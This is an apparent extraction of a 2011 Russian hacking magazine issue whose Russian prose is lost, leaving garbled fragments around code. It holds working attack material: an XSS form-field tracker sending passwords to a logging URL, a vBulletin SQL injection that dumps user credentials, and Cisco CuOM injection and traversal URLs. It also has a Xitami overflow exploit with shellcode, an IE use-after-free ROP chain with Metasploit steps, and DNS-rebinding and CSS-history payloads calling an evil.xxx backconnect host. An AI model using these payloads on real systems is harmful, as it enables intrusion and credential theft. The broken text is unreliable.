.submit(function() {
log({event: 'submit',
from: location,
action: $(this).attr('action') || location,
fields: $(this).serialize()
});
})
.end();
, jQuery, . -
, . . ,
api.jquery.com/category/selectors.
, ,
password : lert(
$('input[name|="password"]').val());.
X 08 /151/ 2011
XSS-tracker iframe
. GET-:
function log(what) {
what["_"] = Math.random();
try {
$.get(logUrl, what);
} catch (e) {
var i = new Image();
i.src = logUrl + "?" + encodeURIComponent($.param(what));
$(i).load(function() {$(this).remove();}).appendTo("body");
}
};
. ,
, . :). .
1. - XSS- IE8 Chrome.
2. (XSS+iframe) frame busting. ,
. :).
3. , - - .
,
. , ,
web-, , :).
,
. .
, XSS-. ,
. HttpOnly +
HTML-.
. , .
XSS-. XSS-tracker,
. XSS-tracker
,
,
. XSS+CSRF. .
PS. aka D1g1 ( Security DVD) ,
:).
PS2.
Defcon-Russia (www.defcon-russia.ru). z
041

iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)
, -: Joomla,
vBulletin WordPress ( ) . , ,
, !
01
SQL- VBULLETIN 4.0.X =>

4.1.2
TABLE_PREFIX .
"$table AS $table WHERE $key IN (" . implode(', ', $id) . ")";
if ($rst = $vbulletin->db->query_read($sql))
{
while($row = $vbulletin->db->fetch_row($rst))
{
$names[] = $row[0];
}
}
CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
vBulletin x ,
CMS (vBulletin Publishing suite),
. J0hn.X3r
,
, .

, .
,
, . ,
.
if (count($names) > 0)
{
return $table_display . ': ' . implode(', ', $names);
}
}
else
{
//If we got here, we have a single value
if ($row = $vbulletin->db->query_first(
"SELECT $table.$fieldname from " . TABLE_PREFIX .
"$table AS $table WHERE $key = $id"))
{
return $table_display . ' ' .
self::getCompareString($comparator, $is_date)
. ' ' . $row[0];
}
}
EXPLOIT
. /vb/search/
searchtools.php getDisplayString:
public static function getDisplayString($table,
$table_display, $fieldname, $key, $id, $comparator, $is_date)
{
global $vbulletin, $vbphrase;
$names = array();
return "";
if (is_array($id))
{
$sql = "SELECT DISTINCT $table.$fieldname from " .
042
$id,
X 08 /151/ 2011
SOLUTION
.
,
, $id , :
$id = $vbulletin->db->sql_prepare($id);
if (is_array($id))
{
Cisco ,
. ,
, /packages/vbforum/search/type/
socialgroup.php, 201-203:
vB_Search_Searchtools::getDisplayString(
'socialgroupcategory', $vbphrase['categories'],
'title', 'socialgroupcategoryid',
$value, vB_Search_Core::OP_EQ, true ));
- . ?
,
social groups.
Live HTTP Headers Firefox, POST-.
,
search.php. Search Multiple Content
Types groups,
- ,
, team. POST- :
type%5B%5D=7&query=team&titleonly=1&searchuser=&ex
actname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=a
fter&sortby=relevance&order=descending&saveprefs=1&s=&securit
ytoken=1302542927-d4cf038925f1bba6869e060b837d651371f1c0e0&do
=process&searchthreadid=
SQL:
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d6513
71f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION SELECT
'haxhax' #
!
haxhax. : , ,
, :
fter&sortby=relevance&order=descending&saveprefs=1&s=
&securitytoken=1302542927-d4cf038925f1bba6869e060b837d
651371f1c0e0&do=process&searchthreadid=&cat[0]=1) UNION
SELECT concat_ws(0x3a,username,password,salt,email) FROM
bulletinuser limit 1,1#
, John The Ripper, PasswordsPro -

, .
TARGETS
vBulletin Publishing Suite 4.0.0 4.1.2
vBulletin Forum Classic 4.0.0 4.1.2
X 08 /151/ 2011
. $id
, sql_prepare()
( , , ).
:
function sql_prepare($value)
{
if (is_string($value))
{
return "'" . $this->escape_string($value) . "'";
}
else if (is_numeric($value) AND $value + 0 == $value)
{
return $value;
}
else if (is_bool($value))
{
return $value ? 1 : 0;
}
else if (is_null($value))
{
return "''";
}
else if (is_array($value))
{
foreach ($value as $key => $item)
{
$value[$key] = $this->sql_prepare($item);
}
return $value;
}
else
{
return "'" . $this->escape_string($value) . "'";
}
}
02

CISCO UNIFIED OPERATIONS MANAGER
8.0 8.5
CVSSV2
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Cisco Unified Operations Manager (CuOM)
, .
. Sense of Security
: SQL-, ,
-. ,
CVSS
, SQL-,
7,5 10.
043
vBulletin
0c0c0c0c
EXPLOIT
1. CCMs PRTestCreation.do
SQL-, :
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs=
'waitfor%20delay'0:0:20'--&Extns=&IPs=
ccm
TelePresenceReportAction.do:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20
delay'0:0:20'--
2. XSS
Common Services Device Center,
:
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)
</script>23fbe43447/iptm/logicalTopo.do?clusterName=
db4c1"%3balert(1)//4031caf63d7
SOS-11006, . Common Services

Framework Help Servlet, XSS:
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</
script>5f5251aaad=1
3. - - CiscoWorks
Homepage,
-, .
,
:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..
\boot.ini
\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\
classes\schedule.properties
\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\
dbservice2\DBServer.properties
\Program Files\CSCOpx\log\dbpwdChange.log
044
SOLUTION
CuOM 8.6 . Cisco, , : CSCtn61716, CSCto12704, CSCto12712
CSCto35577.
03
XITAMI WEB SERVER 2.5B4:
CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Xitami web/ftp-, 1996
2000 iMatrix,
. . Xitami
,
.
, , -, web/ftp-.
exploit-db.com
Remote Exploits.
.
EXPLOIT
. :
#root@bt:~# cd Desktop/
#root@bt:~# ./Xitami2_5b4.pl
# Enter your target's IP (e.g.: 192.168.0.123)
# > 192.168.178.37
# [*] Sending the evil header at: 192.168.178.37
# [*] OK, exploitation Done!
# [*] Check please for the shell
, ,
. .
# msfpayload windows/exec cmd=calc.exe R | msfencode -e x86/
alpha_mixed -t perl
[*] x86/alpha_mixed succeeded with size 461 (iteration=1)
my $buf =
"\x89\xe2\xd9\xea\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
.
.
.
.
X 08 /151/ 2011
push esp - retn, nop-

(
..., 0x00c8fee8):
00C8FEA4 00A27C57 W|. ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
00C8FEA8 004922F4 "I. ASCII "%s %d %d:%d:%d %d"
00C8FEAC 00C8FEE8 . ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
nop-
"\x75\x4a\x49\x49\x6c\x58\x68\x4c\x49\x45\x50\x43\x30\x43"
"\x30\x45\x30\x4b\x39\x4d\x35\x50\x31\x58\x52\x51\x74\x4c"
"\x4b\x43\x62\x54\x70\x4c\x4b\x50\x52\x54\x4c\x4c\x4b\x52"
"\x72\x45\x44\x4c\x4b\x51\x62\x45\x78\x56\x6f\x4c\x77\x50"
"\x4a\x54\x66\x56\x51\x49\x6f\x54\x71\x4f\x30\x4c\x6c\x47"
"\x4c\x51\x71\x51\x6c\x43\x32\x54\x6c\x51\x30\x4b\x71\x5a"
"\x6f\x54\x4d\x43\x31\x5a\x67\x58\x62\x5a\x50\x52\x72\x50"
"\x57\x4c\x4b\x56\x32\x54\x50\x4c\x4b\x50\x42\x45\x6c\x43"
"\x31\x58\x50\x4c\x4b\x43\x70\x51\x68\x4f\x75\x4f\x30\x43"
"\x44\x52\x6a\x45\x51\x5a\x70\x52\x70\x4c\x4b\x51\x58\x45"
"\x48\x4e\x6b\x43\x68\x45\x70\x47\x71\x49\x43\x4d\x33\x45"
"\x6c\x51\x59\x4c\x4b\x54\x74\x4e\x6b\x45\x51\x4b\x66\x54"
"\x71\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x5a\x61\x58\x4f\x56"
"\x6d\x47\x71\x5a\x67\x45\x68\x4b\x50\x54\x35\x4b\x44\x43"
"\x33\x51\x6d\x4b\x48\x45\x6b\x43\x4d\x47\x54\x50\x75\x5a"
"\x42\x43\x68\x4e\x6b\x50\x58\x47\x54\x45\x51\x5a\x73\x45"
"\x36\x4c\x4b\x56\x6c\x52\x6b\x4e\x6b\x56\x38\x45\x4c\x56"
"\x61\x49\x43\x4e\x6b\x47\x74\x4e\x6b\x43\x31\x5a\x70\x4c"
"\x49\x50\x44\x47\x54\x56\x44\x51\x4b\x43\x6b\x43\x51\x51"
"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x48\x51\x4f\x43"
"\x6a\x4e\x6b\x47\x62\x5a\x4b\x4f\x76\x43\x6d\x50\x6a\x47"
"\x71\x4c\x4d\x4e\x65\x58\x39\x43\x30\x43\x30\x45\x50\x52"
"\x70\x51\x78\x50\x31\x4c\x4b\x52\x4f\x4f\x77\x4b\x4f\x49"
"\x45\x4f\x4b\x4c\x30\x4c\x75\x4c\x62\x43\x66\x43\x58\x4c"
"\x66\x4c\x55\x4d\x6d\x4f\x6d\x4b\x4f\x4e\x35\x47\x4c\x43"
"\x36\x43\x4c\x54\x4a\x4b\x30\x4b\x4b\x4d\x30\x52\x55\x45"
"\x55\x4f\x4b\x50\x47\x52\x33\x51\x62\x50\x6f\x52\x4a\x43"
"\x30\x56\x33\x4b\x4f\x4b\x65\x45\x33\x50\x61\x52\x4c\x50"
"\x63\x56\x4e\x43\x55\x50\x78\x52\x45\x47\x70\x41\x41";
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Xitami2_5b4.pl,
, , , ip .
.
_sscanf:
00C8FEB0
00C8FEB4
00C8FEB8
00C8FEBC
00C8FEC0
00C8FEC4
00C8FEC8
00C8FECC
00C8FED0
00C8FED4
00C8FED8
00C8FEDC
00C8FEE0
00C8FEE4
00C8FEE8
00C8FEEC
00C8FEF0
00C8FEF4
00C8FED8
00C8FEDC
00C8FEE0
00C8FEE4
00C8FED4
00A0F2A8
00A184DC
00000001
00000000
00000000
00000000
00000000
00000000
00000000
41414141
41414141
41414141
41414141
.
.
.
.
.
.
".
#...
....
....
....
....
....
....
AAAA
AAAA
AAAA
AAAA
AAAAA... , .
DEP,
. - push esp ret.
.
, , . push esp
ret :
$RET = "\x53\x2b\xab\x71";
# ws2_32.dll push ESP ret (Windows XP SP3 [En]).
:
$RET = "\x53\x2b\xa9\x71";
.text:0042A38D
.text:0042A38E
.text:0042A392
.text:0042A393
.text:0042A394
.text:0042A399
.text:0042A399
.text:0042A399
.text:0042A39A
.text:0042A39F
.text:0042A3A3
X 08 /151/ 2011
push eax
lea edx, [esp+7Ch+var_58]
push ecx
push edx
push offset aDSDDDD ; "%d %s %d %d:%d:%d"
loc_42A399: ; CODE XREF: sub_42A1F0+10B#j
push edi ; Src
call _sscanf; <---
mov ecx, [esp+8Ch+var_5C]
add esp, 20h

0x54,0xc3 (push esp retn), ImmDbg
pvefindaddr. pvefindaddr,
!usage pvefindaddr
ImmDbg.
ret,
0x71a92b53. retn, push esp retn, nop-,
.
045
Deveper Tools DOM,

<object> , , ,
, :

TARGETS
Xitami 2.5b4
SOLUTION

04
MS11-050 IE
MSHTML!COBJECTELEMENT USE
AFTER FREE
CVSSV2
9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
Internet Explorer 7-8.
Metasploit.
use-after-free,
, <object>
,
.
Mshtml!CObjectElement,
. , mshtml!CDisplay <object>
,
, , , use-after-free.
EXPLOIT
Metasploit show options.
:
msf >
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit() > set SRVHOST 192.168.0.63
SRVHOST => 192.168.0.63
msf exploit() > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit() > set CMD calc.exe
CMD => calc.exe
msf exploit() > exploit
[*] Exploit running as background job.
[*] Using URL: http://192.168.0.63:8080/b6t3wEBKj
[*] Server started.
msf exploit(ms11_050_mshtml_cobjectelement) >
(http://192.168.0.63:8080/
b6t3wEBKj) . ( IE ),
046
<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right'
hspace='1000' width='1000'>TAG_1</object>";
// document.body.innerHTML += "<a id='tag_3' style='b
ottom:200cm;float:left;padding-left:-1000px; borderwidth:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style=
'font-size:1000pc;margin:auto -1000cm auto auto;'
dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>
, ,
, :
0:008> k
ChildEBP RetAddr
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper
+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert
+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141
, , ,
<object>
, . object
, , .
.
, IE
, use-after-free.
, <object>, , , ,
,
object .
IE7 IE8 DEP
CObjectElement 0c0c0c0c:
mshtml!CElement::Doc:
3cf76b80 8b01
mov eax,dword ptr [ecx]
; ds:0023:147f00a7=0c0c0c0c
X 08 /151/ 2011
0:007> u comctl32!CImageList::_IsSameObject+40 L?2

comctl32!CImageList::_IsSameObject+0x40:
773e3f18 94
773e3f19 c3
xchg eax,esp ; esp == 0c0c0c0c

ret ; kernel32!VirtualAlloc
ROP- :
CuOM
3cf76b82 8b5070 mov edx,dword ptr [eax+70h]
; ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2
call edx
; {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)}
; <-- ( nops + shellcode)
3cf76b87 8b400c mov eax,dword ptr [eax+0Ch]
3cf76b8a c3
ret
IE8 DEP
ROP-:
1. CObjectElement 0c0c0c0c;
2. heap-spray, ROP-
0c0c0c0c;
3. 0x23000000 nops+shellcode.
, ROP-
:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc ( )
0c0c0c10 7c901db3 ; 2:ntdll!memcpy ( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_
COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ;
...
0c0c0c74 de2f62e1 ;
0c0c0c78 a19314eb ;
0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40
;
0c0c0c80 3825a2d7 ;
0c0c0c84 88f8a84d ;
0c0c0c88 0566b421 ;
mshtml!CElement::Doc :
mshtml!CElement::Doc:
3cf76b80 8b01
mov eax,dword ptr [ecx]
; ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070 mov edx,dword ptr [eax+70h]
; ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2
call edx ;
; {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)}
ROP-
, esp eax (0c0c0c0c):
X 08 /151/ 2011
0c0c0c10 7c901db3 ; 2:ntdll!memcpy

( )
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_
COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode ( )
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
kernel32!VirtualAlloc 0x4000
// 0x7f000000, ntdll!memcpy.
:
0c0c0c24
0c0c0c28
0c0c0c2c
0c0c0c30
7f001000
7f001000
23000100
00002fff
;
;
;
;
3:nops+shellcode ( )
2:memcpy:dst
2:memcpy:src
2:memcpy:size
ntdll!memcpy 0x2fff 0x23000100 (

nops + shellcode)
0x7f001000 (rwx-, VirtualAlloc)
nops + shellcode,
0x7f001000:
ntdll!memcpy:
7c901db3 55
push ebp
7c901db4 8bec
mov ebp,esp
7c901db6 57
push edi
7c901db7 56
push esi
7c901db8 8b750 cmov esi,dword ptr [ebp+0Ch]
; ss:0023:0c0c0c2c=23000100
7c901dbb 8b4d10 mov ecx,dword ptr [ebp+10h]
; ss:0023:0c0c0c30=00002fff
7c901dbe 8b7d08 mov edi,dword ptr [ebp+8]
; ss:0023:0c0c0c28=7f001000
...
7c901de6 f3a5
rep movs dword ptr es:[edi],dword ptr [esi]
; nops+shellcode 0x7f001000
...
7c901f4d c9
leave
7c901f4e c3
ret
; 7f001000 (
; nops + shellcode)
TARGETS
Internet Explorer 7-8
SOLUTION
. z
047

, Digital Security (twitter.com/asintsov)
, ESET (twitter.com/matrosov)
CONFIDENCE 2011

CONFidence
. ,
,
.
,
.
:
CONFidence 20-
. IT-security ,
-
( Black Hat, HITB, HashDays, SOURCE, BruCon, DeepSEC).
,
, , ,
, .
, ESET
.
, CONFidence
. , ,
.
048
, :
, , , ,
:).
, 1901 ,

.
, . , :
, (, ),
( ,
). , X 08/151/ 2011
ESET TDL4
, ,
, , .
- , :
...
,
- :). ,
CrackMe ReverseMe Tipping Point
IPS. , ESET

. , ,
.
(2011.
confidence.org.pl/misc/CrackMe/force64.ex_). ,
,

, .
, CONFidence 2011 ,

. ,
, .

Your Network Security Starts at Layer Zero
: ,
, -, . --
. , ,
, ,
. , , .
, ,
? ,
X 08/151/ 2011
,
? ,
. ,
,
,
( , , ), - ,

, .
, ,
.
, ,
, , :).
, , Ekoparty, . (deviating.
net/lockpicking/equipment.html) , , ,
,
. ( ) ,
!
:
,
. Renderman, , Defcon.
(, , ),
.
DVD
dvd

CONFidence 2011

DVD.
: SVG
The forbidden image Security impact of Scalable
Vector Graphics on the WWW
:
049
Digital Security

SVG. ( PHP-IDS
) SVG, ,
XSS, .
, , ,
(, , , IDS
WAF).
: Angry Birds
Hacking a Bird in the Sky: The Revenge of Angry Birds
: , Nobody
, ,
. , . ,
, : ,
(, ,
, WinNT 4.0 ), IP- (
, - , ,
, ). ,
,
,
: TDMA . ,
( ,
, ) .
, ,
:). , IT-security ,
!
, .
:
, (
, , ).
Low Fragmentation
Heap
Modern Heap Exploitation using the Low Fragmentation Heap
:
( , , , PHD CTF ,
050
) . :).
Microsoft
. - , , , ,
Windows. IIS FTP,
, , (
EIP) .
LFH (Low Fragmentation Heap). , MS. ,
, FTP-,
LFH,
.
FreeEntryOffset, , , EIP.
, 5% , - .
x64: TDL
Defeating x64: The Evolution of the TDL Rootkit
: ,
TDL x64
(, PatchGuard),
MBR ,
!
, , TDL4, ,
. .
- TDL .
DNS
DNS for evil
:
DNS for evil, DNS-
C&C. ,
][.
Microsoft Windows
Escaping From Microsoft Windows Sandboxes
:
X 08/151/ 2011
Lockpicking - .
Verizone,
.
(, , ,
, ..), ,
, .
. , ,
, , , DEP ASLR. , ,
( ,
)
. .
. Google Chrome,

, Acrobat Reader, Flash,
Protection Mode IE8 :).
, ][
? ,
!
MC13224
Practical attacks on the Freescale MC13224 ZigBee SoP
:
, !
,
! .
MC13224,
,
.. (, Defcon 18). MC13224
32- ARM7, , 802.15.4 . ,

CONFidence?
,
.
( ),
. ,
( )
. ,
,
X 08/151/ 2011
: ,
? !
, JTAG- ?
. ,
... ! ...
. , bit.ly/kE5jHV. ,
, .
. ,
:).
: ...
Outro
, ,
, , BeeF.
( ) 2011.confidence.
org.pl/materials ( . ). ,
,
.
CONFidence, .
,
. . ,
. , , PHD
, ,
: ,
( Chaos Constructions
). . Defcon ( -),
,

. ! z
- .
. ,
, ,
.
,
. ,
. ,
CONFidence.
,
, , -
.
051
CTF
19
Positive Hack Days,
Positive Technologies,
CTF. 10 , ,
8
.
, ,
. , . .
,
.
, ,
.
. Positive Hack Days TF
, , .
,
CTF HackQuest. whitebox ( )
blackbox- ( ).
.
, , , -
052

.
, -, , ..,
CTF
,
.
,
,
,
.
.
,
, .
, , .
X 08/151/ 2011
,
. , ,
, , , .
, ,
.

.

, CTF, .
,

SCADA (, ).
, , ,

.
,
, .
PHD (Parallelepiped Habile
Deflective).
,

. ,
, , PHD
X 08/151/ 2011
,

.
. ,

.
,
. ,
...

-
() Plaid Parliament of
Pwning (PPP) 5
.
Leet More - , (
3 ).
HackerDom
, 2
.
CTF ,

:
CTF, .
PHDAYS CTF 2012
, .
.
,
, PPP
.
PPP ,
.
,

.

CTF.
CTF,
PHD CTF
,
. ,
.
PPP
,
PHDays,
.
CTF :
,
, CTF. ,
, -, , ,
.
.
,
,

.
053
,
Positive Technologies
- PHD
-.
?
,
.
,
-
.
, -
,
, ,
. ,
,
, , ,
, .
RusCrypto CTF.
Positive Hack Days
, ,
InfosecurityMoscow, Chaos Constructions, .
- PHD , 4 ?
Positive Hack Days. ,
,
, . ,
, .
, , , 4
054
.
,
. 70%,
. 30% , , . , ,
, , , , .
-
?
Positive Hack Days ,
, .
, .
PHD, ,
, , ,
, , . ,
, . , . , CTF
! CTF, PHD, CTF ,
, .
- ?
! ,
, , , ,
, .
, ,
.
- ?
CTF ,
. - , ,
. , ,
.
X 08/151/ 2011
- Defcon?

BlackHat Defcon,
,
. ,
.

, Cisco
,
-
. .
-
PHD, -
-?
PHD, , .

.
,
, ,
, . , ,
, , ,
- . . , .
- , ?
Positive Hack
Days! , . PHD ,
, , - .
( , ,
, ,
). ,
,
,
. ,
,
.
PHD, .
- Positive Hack Days .

, , ?
PHD.
, .
.
,
, PHD . ,
- PHD

. ?

Positive Hack Days 4 . , ,

. CTF Enterprise-,
X 08/151/ 2011
, . ,
, ,
,

R&D
. ,
, ,
,
. ,
Research & Development ,

,
.
,
, .
- PHD?
,
, Positive Hack
Days . ,
ositive
Technologies,
- , ,
.
, , ,
,
, -
, . z
055
DNS REBINDING
Same origin policy

,
, Same origin policy.
,
, .
POST-
javascript css.
, .

, , .
,
( CSRF-),
, . , , CSRF-,
. ,
( ),
.
,
. - Outlook Web Access.
Same origin policy Anti DNS pinning, DNS
rebinding. Anti DNS pinning -,
HTTP-
Host. , web- Apache
IIS .
056
, HTTP, web. , , API

SOAP, XML-RPC .
, -
, DNS-.
IP-. ,
. ( ) :
1) , .
2) DNS- IP-,
.
3) web- ( IP)
javascript.
4) Javascript
.
5) X 08/151/ 2011
Outlook Web Access

.
6) IP- (
DNS-) IP- .
,
evil.xxx, ,
IP- ,
IP- . , ,
- .
, .
, ,
WEB- DNS-,
, .
NS-
.
NS- , IP- . IP- , Javascript, , , IP-
.
, ,
(
), .
Bind 9.
IP- ,
--enable-fixed-rrset. , , ,
. bind9 , IP-.
named.conf.options, options :
rrset-oredr { order fixed; };
. dns.evil.xxx:
dns
A
A
97.246.251.93
192.168.0.1
, DNS- , dns.attacker.ru
IP- 97.246.251.93, , , 192.168.0.1.
,
.
X 08/151/ 2011
DNS ( Apache), .
iptables,
tcp-reset ,
TCP- . iptables
:
iptables -A INPUT -s [ IP-] -p tcp \
--dport 80 -j REJECT --reject-with tcp-reset
80- ,
, . :
1) dns.evil.xxx.
2) DNS- IP- .
3) ,
IP 97.246.251.93.
4) HTML- JavaScript.
5) , javascript
dns.evil.xxx.
6)
IP- .
7)
dns.attacker.ru , 97.246.251.93 RST, 192.168.0.1.
javascript GET/POST/HEAD-
, 97.246.251.93,
!
, , , .
? -, ,
,
- , .
,
. , /, .
,
057
DNS Rebinding
OWA
- online.
,
,
. , Same Origin Policy
, ,
AJAX-,
XMLHttpRequest.
,
(
) ,
(80- ).
, Same
Origin Policy. , JSONP,
, ( JSONP , web). , .
XMLHttpRequest ,
, .
.
,
setInterval,
,
, . .
, , . , .
IP- . -,

. -,

, . -,
IP-
(
).
058
IP- . , , IFRAME
onLoad.
Image onLoad , . ,
, setTimeout,
, , ,
.

:
1) -
IP-, onLoad
.
2)
.
3) /
.

.
CSS History Hack v 2.0
-, .
, javascript
, , .
, ,
javascript <a>
. ,
CSS.
, .
( IE8) ,
. ,
-. , :
var links = [
'http://192.168.0.1',
'http://192.168.1.1',
'http://10.1.1.1'
];
STYLE
CSS- :
A#id:visited { background:url('http://admin.evil.xxx:8080/
backonnect.php?url=http://192.168.0.1'); }
X 08/151/ 2011
basic-
Cisco
, , ,
url, , url .
,
, .
2)
.
3) DNS- ,
IP-. :
DNS rebinding ,

TCP handshake. ,
. , IE Firefox
200 OK , Opera
404 IP-.
, .
,
HTML-. , IP-
,
DNS.
, ip- 192.168.0.1
192.168.0.1.dns.evil.xxx. http://
dns.evil.xxx/control.html iframe,
, DNS Rebinding, , ,
http://192.168.0.1.dns.evil.xxx/rebinding.html.
,
- ,
.
: , , :).
,
, ip- , . .
:
1) ip- (, 97.246.251.93).
iptables
X 08/151/ 2011
97.246.251.93.dns.evil.xxx
A
A
97.246.251.93
192.168.0.1
4)
src- IFRAME.
5) , 192.168.0.1.evil.xxx .
6)
, 80- .
7)
.
8) ,
.
9)
, 80- .
10) ,
.
DNS-
DNS, ,
nsupdate. DNS-
.
DNS
Rebinding
,
, :
1) . -
VirtualHost _default_, *:80 .
2) -.
, ,
, Host HTTP ,
.
3) NOSCRIPT ,
JavaScript, Java-
Flash-.
4) , , ,
, .
, API,
. , API
Amazon EC2, VMware ESX. z
059

(twitter.com/ABazhanyuk, CISS Research Team)
(twitter.com/NTarakanov, CISS Research Team)
0DAY

. , :
PHD
. Safari (
0day Windows),
.

, ?
:
Windows Internet Explorer (6/7/8)
Mozilla Firefox (3*/4*)
Google Chrome
Safari
Opera
Opera Mini
Netscape Navigator
Midori
Skyfire
Dolphin
Konpueror
Dooble
OpenSource-:
Chrome, Firefox Konqueror.
(engine-). :
Amaya
Gecko
HTMLayout
KHTML
Presto
Prince
060
Trident
WebKit
, Chrome Safari OpenSource- WebKit,
Firefox Gecko. JavaScript
, , , Google
V8 ( Rhino SpiderMonkey). , flash, jre (
) .
, .

, cross_fuzz . Google
-, .
(bit.ly/lbgfqm)
Internet Explorer, Firefox, Opera,
WebKit. ( ,
) !
cross_fuzz .

DOM-, . ,
X 08/151/ 2011
INFO
info

,
Selenium
(seleniumhq.org).

,

.
IE8

Safari
HTTP://WWW
. Safari
User mode write access violations that are not near
NULL are exploitable, eip.
links
JS
(DOM) :
www.webdevout.net/
browser-supportecmascript.
and dword ptr ds:0BBADBEEFh, 0

xor eax, eax
call eax
:
heideri.ch/jso.
- , ,
Webkit CRASH(). - ,
. CRASH
, -
- ,
.
,
-
. ,
.
,
:). cross_fuzz HTML/
JavaScript (lcamtuf.coredump.cx/cross_fuzz),
HTML-
( )
. ,
.
( /targets
mersenne.js/logo.jpg).
popup .
:
Firefox 3.6.16;
Firefox 4.0.1;
Chrome 10;
Internet Explorer 8/9;
Safari 5.0.5.
X 08/151/ 2011

,
,
..:
www.quirksmode.org.

HTML-
.
, cross_fuzz Safari,
5 .
Firefox 3.6.16 15-30
.
DEP.
use-after-free, .
,
3-5 . Chrome . IE
, , .
:
,
, . ,
,
? ,
, .
Cross_fuzz DOM,
.
,
Sandbox
Chrome: dev.chromium.org/developers/
design-documents/
sandbox.
061
cross_fuzz HTML/JavaScript

DOM. , .
,
. , , .
cross_fuzz return LOG(message).
, ,
cross_fuzz .
, cross_fuzz .
, , Firebug
Firefox. - JS
:
try {
console.log('eval %s',name);
ret_value = eval('target.' + name + '(' + par_str + ')');
} catch (e) {
Firebug,
( ). ( , )
C:\Documents and Settings\username\Application Data\Mozilla\Firefox\
Profiles\XXXXXX.default\js. , :
Chrome: Firebug Lite for Google Chrome (
Chrome);
Opera: Opera Dragonfly;
Safari: WebKitDeveloperExtras.
, cross_fuzz, ,
, .
( , ) .
, .
,
. , . ,
, DEP/
ASLR (
062
][ , , ).
.
,
. ()
, ,
.
, .
,
. , ,
:
Internet Explorer (mzl.la/mC8XP5);
Firefox (bit.ly/jiHbQA).
Safari (bit.ly/jiHbQA) , (Webkit.dll, JavaScriptCore.dll)
. ,
, WebKit .
svn.webkit.org/repository/webkit,
